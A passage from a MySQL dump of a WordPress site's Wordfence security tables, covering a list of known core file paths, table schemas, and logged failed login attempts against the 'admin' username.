js/wp-custom-header.min.js'),(6798,'wp-includes/wp-includes/js/wp-embed-template.js'),(6799,'wp-includes/wp-includes/js/wp-embed-template.min.js'),(6800,'wp-includes/wp-includes/js/wp-embed.js'),(6801,'wp-includes/wp-includes/js/wp-embed.min.js'),(6802,'wp-includes/wp-includes/js/wp-emoji-loader.js'),(6803,'wp-includes/wp-includes/js/wp-emoji-loader.min.js'),(6804,'wp-includes/wp-includes/js/wp-emoji-release.min.js'),(6805,'wp-includes/wp-includes/js/wp-emoji.js'),(6806,'wp-includes/wp-includes/js/wp-emoji.min.js'),(6807,'wp-includes/wp-includes/js/wp-list-revisions.js'),(6808,'wp-includes/wp-includes/js/wp-list-revisions.min.js'),(6809,'wp-includes/wp-includes/js/wp-lists.js'),(6810,'wp-includes/wp-includes/js/wp-lists.min.js'),(6811,'wp-includes/wp-includes/js/wp-pointer.js'),(6812,'wp-includes/wp-includes/js/wp-pointer.min.js'),(6813,'wp-includes/wp-includes/js/wp-sanitize.js'),(6814,'wp-includes/wp-includes/js/wp-sanitize.min.js'),(6815,'wp-includes/wp-includes/js/wp-util.js'),(6816,'wp-includes/wp-includes/js/wp-util.min.js'),(6817,'wp-includes/wp-includes/js/wpdialog.js'),(6818,'wp-includes/wp-includes/js/wpdialog.min.js'),(6819,'wp-includes/wp-includes/js/wplink.js'),(6820,'wp-includes/wp-includes/js/wplink.min.js'),(6821,'wp-includes/wp-includes/js/zxcvbn-async.js'),(6822,'wp-includes/wp-includes/js/zxcvbn-async.min.js'),(6823,'wp-includes/wp-includes/js/zxcvbn.min.js'),(6824,'wp-includes/wp-includes/kses.php'),(6825,'wp-includes/wp-includes/l10n.php'),(6826,'wp-includes/wp-includes/link-template.php'),(6827,'wp-includes/wp-includes/load.php'),(6828,'wp-includes/wp-includes/locale.php'),(6829,'wp-includes/wp-includes/media-template.php'),(6830,'wp-includes/wp-includes/media.php'),(6831,'wp-includes/wp-includes/meta.php'),(6832,'wp-includes/wp-includes/ms-blogs.php'),(6833,'wp-includes/wp-includes/ms-default-constants.php'),(6834,'wp-includes/wp-includes/ms-default-filters.php'),(6835,'wp-includes/wp-includes/ms-deprecated.php'),(6836,'wp-includes/wp-includes/ms-files.php'),(6837,'wp-includes/wp-includes/ms-functions.php'),(6838,'wp-includes/wp-includes/ms-load.php'),(6839,'wp-includes/wp-includes/ms-network.php'),(6840,'wp-includes/wp-includes/ms-settings.php'),(6841,'wp-includes/wp-includes/ms-site.php'),(6842,'wp-includes/wp-includes/nav-menu-template.php'),(6843,'wp-includes/wp-includes/nav-menu.php'),(6844,'wp-includes/wp-includes/option.php'),(6845,'wp-includes/wp-includes/pluggable-deprecated.php'),(6846,'wp-includes/wp-includes/pluggable.php'),(6847,'wp-includes/wp-includes/plugin.php'),(6848,'wp-includes/wp-includes/post-formats.php'),(6849,'wp-includes/wp-includes/post-template.php'),(6850,'wp-includes/wp-includes/post-thumbnail-template.php'),(6851,'wp-includes/wp-includes/post.php'),(6852,'wp-includes/wp-includes/query.php'),(6853,'wp-includes/wp-includes/random_compat/byte_safe_strings.php'),(6854,'wp-includes/wp-includes/random_compat/cast_to_int.php'),(6855,'wp-includes/wp-includes/random_compat/error_polyfill.php'),(6856,'wp-includes/wp-includes/random_compat/random.php'),(6857,'wp-includes/wp-includes/random_compat/random_bytes_com_dotnet.php'),(6858,'wp-includes/wp-includes/random_compat/random_bytes_dev_urandom.php'),(6859,'wp-includes/wp-includes/random_compat/random_bytes_libsodium.php'),(6860,'wp-includes/wp-includes/random_compat/random_bytes_libsodium_legacy.php'),(6861,'wp-includes/wp-includes/random_compat/random_bytes_mcrypt.php'),(6862,'wp-includes/wp-includes/random_compat/random_int.php'),(6863,'wp-includes/wp-includes/registration-functions.php'),(6864,'wp-includes/wp-includes/registration.php'),(6865,'wp-includes/wp-includes/rest-api/class-wp-rest-request.php'),(6866,'wp-includes/wp-includes/rest-api/class-wp-rest-response.php'),(6867,'wp-includes/wp-includes/rest-api/class-wp-rest-server.php'),(6868,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php'),(6869,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php'),(6870,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php'),(6871,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php'),(6872,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php'),(6873,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php'),(6874,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php'),(6875,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php'),(6876,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-controller.php'),(6877,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php'),(6878,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php'),(6879,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php'),(6880,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php'),(6881,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php'),(6882,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php'),(6883,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php'),(6884,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php'),(6885,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php'),(6886,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php'),(6887,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php'),(6888,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php'),(6889,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php'),(6890,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php'),(6891,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php'),(6892,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php'),(6893,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php'),(6894,'wp-includes/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php'),(6895,'wp-includes/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php'),(6896,'wp-includes/wp-includes/rest-api/search/class-wp-rest-search-handler.php'),(6897,'wp-includes/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php'),(6898,'wp-includes/wp-includes/rest-api.php'),(6899,'wp-includes/wp-includes/revision.php'),(6900,'wp-includes/wp-includes/rewrite.php'),(6901,'wp-includes/wp-includes/robots-template.php'),(6902,'wp-includes/wp-includes/rss-functions.php'),(6903,'wp-includes/wp-includes/rss.php'),(6904,'wp-includes/wp-includes/script-loader.php'),(6905,'wp-includes/wp-includes/session.php'),(6906,'wp-includes/wp-includes/shortcodes.php'),(6907,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-index.php'),(6908,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-provider.php'),(6909,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-registry.php'),(6910,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-renderer.php'),(6911,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php'),(6912,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps.php'),(6913,'wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php'),(6914,'wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php'),(6915,'wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php'),(6916,'wp-includes/wp-includes/sitemaps.php'),(6917,'wp-includes/wp-includes/sodium_compat/LICENSE'),(6918,'wp-includes/wp-includes/sodium_compat/autoload-php7.php'),(6919,'wp-includes/wp-includes/sodium_compat/autoload.php'),(6920,'wp-includes/wp-includes/sodium_compat/composer.json'),(6921,'wp-includes/wp-includes/sodium_compat/lib/constants.php'),(6922,'wp-includes/wp-includes/sodium_compat/lib/namespaced.php'),(6923,'wp-includes/wp-includes/sodium_compat/lib/php72compat.php'),(6924,'wp-includes/wp-includes/sodium_compat/lib/php72compat_const.php'),(6925,'wp-includes/wp-includes/sodium_compat/lib/sodium_compat.php'),(6926,'wp-includes/wp-includes/sodium_compat/namespaced/Compat.php'),(6927,'wp-includes/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php'),(6928,'wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(6929,'wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(6930,'wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php'),(6931,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(6932,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(6933,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(6934,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(6935,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(6936,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(6937,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php'),(6938,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519.php'),(6939,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Ed25519.php'),(6940,'wp-includes/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php'),(6941,'wp-includes/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php'),(6942,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php'),(6943,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305.php'),(6944,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Salsa20.php'),(6945,'wp-includes/wp-includes/sodium_compat/namespaced/Core/SipHash.php'),(6946,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Util.php'),(6947,'wp-includes/wp-includes/sodium_compat/namespaced/Core/X25519.php'),(6948,'wp-includes/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php'),(6949,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php'),(6950,'wp-includes/wp-includes/sodium_compat/namespaced/Crypto.php'),(6951,'wp-includes/wp-includes/sodium_compat/namespaced/File.php'),(6952,'wp-includes/wp-includes/sodium_compat/src/Compat.php'),(6953,'wp-includes/wp-includes/sodium_compat/src/Core/BLAKE2b.php'),(6954,'wp-includes/wp-includes/sodium_compat/src/Core/Base64/Common.php'),(6955,'wp-includes/wp-includes/sodium_compat/src/Core/Base64/Original.php'),(6956,'wp-includes/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php'),(6957,'wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php'),(6958,'wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(6959,'wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20.php'),(6960,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php'),(6961,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(6962,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(6963,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(6964,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(6965,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(6966,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/H.php'),(6967,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/README.md'),(6968,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519.php'),(6969,'wp-includes/wp-includes/sodium_compat/src/Core/Ed25519.php'),(6970,'wp-includes/wp-includes/sodium_compat/src/Core/HChaCha20.php'),(6971,'wp-includes/wp-includes/sodium_compat/src/Core/HSalsa20.php'),(6972,'wp-includes/wp-includes/sodium_compat/src/Core/Poly1305/State.php'),(6973,'wp-includes/wp-includes/sodium_compat/src/Core/Poly1305.php'),(6974,'wp-includes/wp-includes/sodium_compat/src/Core/Salsa20.php'),(6975,'wp-includes/wp-includes/sodium_compat/src/Core/SecretStream/State.php'),(6976,'wp-includes/wp-includes/sodium_compat/src/Core/SipHash.php'),(6977,'wp-includes/wp-includes/sodium_compat/src/Core/Util.php'),(6978,'wp-includes/wp-includes/sodium_compat/src/Core/X25519.php'),(6979,'wp-includes/wp-includes/sodium_compat/src/Core/XChaCha20.php'),(6980,'wp-includes/wp-includes/sodium_compat/src/Core/XSalsa20.php'),(6981,'wp-includes/wp-includes/sodium_compat/src/Core32/BLAKE2b.php'),(6982,'wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(6983,'wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(6984,'wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20.php'),(6985,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),(6986,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(6987,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(6988,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(6989,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(6990,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(6991,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),(6992,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),(6993,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519.php'),(6994,'wp-includes/wp-includes/sodium_compat/src/Core32/Ed25519.php'),(6995,'wp-includes/wp-includes/sodium_compat/src/Core32/HChaCha20.php'),(6996,'wp-includes/wp-includes/sodium_compat/src/Core32/HSalsa20.php'),(6997,'wp-includes/wp-includes/sodium_compat/src/Core32/Int32.php'),(6998,'wp-includes/wp-includes/sodium_compat/src/Core32/Int64.php'),(6999,'wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),(7000,'wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305.php'),(7001,'wp-includes/wp-includes/sodium_compat/src/Core32/Salsa20.php'),(7002,'wp-includes/wp-includes/sodium_compat/src/Core32/SecretStream/State.php'),(7003,'wp-includes/wp-includes/sodium_compat/src/Core32/SipHash.php'),(7004,'wp-includes/wp-includes/sodium_compat/src/Core32/Util.php'),(7005,'wp-includes/wp-includes/sodium_compat/src/Core32/X25519.php'),(7006,'wp-includes/wp-includes/sodium_compat/src/Core32/XChaCha20.php'),(7007,'wp-includes/wp-includes/sodium_compat/src/Core32/XSalsa20.php'),(7008,'wp-includes/wp-includes/sodium_compat/src/Crypto.php'),(7009,'wp-includes/wp-includes/sodium_compat/src/Crypto32.php'),(7010,'wp-includes/wp-includes/sodium_compat/src/File.php'),(7011,'wp-includes/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php'),(7012,'wp-includes/wp-includes/sodium_compat/src/SodiumException.php'),(7013,'wp-includes/wp-includes/spl-autoload-compat.php'),(7014,'wp-includes/wp-includes/taxonomy.php'),(7015,'wp-includes/wp-includes/template-loader.php'),(7016,'wp-includes/wp-includes/template.php'),(7017,'wp-includes/wp-includes/theme-compat/comments.php'),(7018,'wp-includes/wp-includes/theme-compat/embed-404.php'),(7019,'wp-includes/wp-includes/theme-compat/embed-content.php'),(7020,'wp-includes/wp-includes/theme-compat/embed.php'),(7021,'wp-includes/wp-includes/theme-compat/footer-embed.php'),(7022,'wp-includes/wp-includes/theme-compat/footer.php'),(7023,'wp-includes/wp-includes/theme-compat/header-embed.php'),(7024,'wp-includes/wp-includes/theme-compat/header.php'),(7025,'wp-includes/wp-includes/theme-compat/sidebar.php'),(7026,'wp-includes/wp-includes/theme.php'),(7027,'wp-includes/wp-includes/update.php'),(7028,'wp-includes/wp-includes/user.php'),(7029,'wp-includes/wp-includes/vars.php'),(7030,'wp-includes/wp-includes/version.php'),(7031,'wp-includes/wp-includes/widgets/class-wp-nav-menu-widget.php'),(7032,'wp-includes/wp-includes/widgets/class-wp-widget-archives.php'),(7033,'wp-includes/wp-includes/widgets/class-wp-widget-calendar.php'),(7034,'wp-includes/wp-includes/widgets/class-wp-widget-categories.php'),(7035,'wp-includes/wp-includes/widgets/class-wp-widget-custom-html.php'),(7036,'wp-includes/wp-includes/widgets/class-wp-widget-links.php'),(7037,'wp-includes/wp-includes/widgets/class-wp-widget-media-audio.php'),(7038,'wp-includes/wp-includes/widgets/class-wp-widget-media-gallery.php'),(7039,'wp-includes/wp-includes/widgets/class-wp-widget-media-image.php'),(7040,'wp-includes/wp-includes/widgets/class-wp-widget-media-video.php'),(7041,'wp-includes/wp-includes/widgets/class-wp-widget-media.php'),(7042,'wp-includes/wp-includes/widgets/class-wp-widget-meta.php'),(7043,'wp-includes/wp-includes/widgets/class-wp-widget-pages.php'),(7044,'wp-includes/wp-includes/widgets/class-wp-widget-recent-comments.php'),(7045,'wp-includes/wp-includes/widgets/class-wp-widget-recent-posts.php'),(7046,'wp-includes/wp-includes/widgets/class-wp-widget-rss.php'),(7047,'wp-includes/wp-includes/widgets/class-wp-widget-search.php'),(7048,'wp-includes/wp-includes/widgets/class-wp-widget-tag-cloud.php'),(7049,'wp-includes/wp-includes/widgets/class-wp-widget-text.php'),(7050,'wp-includes/wp-includes/widgets.php'),(7051,'wp-includes/wp-includes/wlwmanifest.xml'),(7052,'wp-includes/wp-includes/wp-db.php'),(7053,'wp-includes/wp-includes/wp-diff.php'),(7054,'wp-links-opml.php'),(7055,'wp-load.php'),(7056,'wp-login.php'),(7057,'wp-mail.php'),(7058,'wp-settings.php'),(7059,'wp-signup.php'),(7060,'wp-trackback.php'),(7061,'xmlrpc.php');
/*!40000 ALTER TABLE `wp_wfknownfilelist` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wflivetraffichuman`
--
DROP TABLE IF EXISTS `wp_wflivetraffichuman`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflivetraffichuman` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`expiration` int(10) unsigned NOT NULL,
PRIMARY KEY (`IP`,`identifier`),
KEY `expiration` (`expiration`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wflivetraffichuman`
--
LOCK TABLES `wp_wflivetraffichuman` WRITE;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wflocs`
--
DROP TABLE IF EXISTS `wp_wflocs`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflocs` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`ctime` int(10) unsigned NOT NULL,
`failed` tinyint(3) unsigned NOT NULL,
`city` varchar(255) DEFAULT '',
`region` varchar(255) DEFAULT '',
`countryName` varchar(255) DEFAULT '',
`countryCode` char(2) DEFAULT '',
`lat` float(10,7) DEFAULT 0.0000000,
`lon` float(10,7) DEFAULT 0.0000000,
PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wflocs`
--
LOCK TABLES `wp_wflocs` WRITE;
/*!40000 ALTER TABLE `wp_wflocs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflocs` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wflogins`
--
DROP TABLE IF EXISTS `wp_wflogins`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflogins` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`hitID` int(11) DEFAULT NULL,
`ctime` double(17,6) unsigned NOT NULL,
`fail` tinyint(3) unsigned NOT NULL,
`action` varchar(40) NOT NULL,
`username` varchar(255) NOT NULL,
`userID` int(10) unsigned NOT NULL,
`IP` binary(16) DEFAULT NULL,
`UA` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `k1` (`IP`,`fail`),
KEY `hitID` (`hitID`)
) ENGINE=InnoDB AUTO_INCREMENT=6220 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wflogins`
--
LOCK TABLES `wp_wflogins` WRITE;
/*!40000 ALTER TABLE `wp_wflogins` DISABLE KEYS */;
INSERT INTO `wp_wflogins` VALUES (4220,6625,1628814307.039161,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4221,6626,1628814789.816578,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4222,6629,1628816298.043135,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4223,6630,1628816778.872692,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4224,6632,1628817809.205781,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��O���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4225,6633,1628818310.044767,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4226,6634,1628818809.229003,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���u��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4227,6639,1628821980.537173,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@�D�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4228,6640,1628822393.316207,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4229,6641,1628822699.804075,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����PE','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4230,6642,1628823035.679703,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4231,6643,1628823370.881829,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4232,6646,1628824681.057296,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4233,6648,1628825337.732694,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��|��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4234,6649,1628825678.715109,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4235,6650,1628825985.077915,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��k�R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4236,6651,1628826310.418859,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#��p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4237,6652,1628826634.996507,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��h��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4238,6653,1628826955.082101,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g#f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4239,6655,1628827722.128773,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���A\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4240,6656,1628827742.961769,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����f','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'),(4241,6658,1628828388.256065,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���a�S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4242,6659,1628828669.640689,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��BF��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4243,6660,1628829002.192114,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4244,6661,1628829295.823699,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���R-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4245,6662,1628829611.588731,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4246,6663,1628829925.074540,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gZ�j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4247,6664,1628830264.110678,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��N.��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4248,6665,1628830550.763237,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#�w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4249,6666,1628831189.219285,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4250,6669,1628832452.634436,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4251,6669,1628832452.679240,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4252,6670,1628832774.571850,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��k��\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4253,6671,1628833094.828085,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4254,6672,1628833418.200291,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 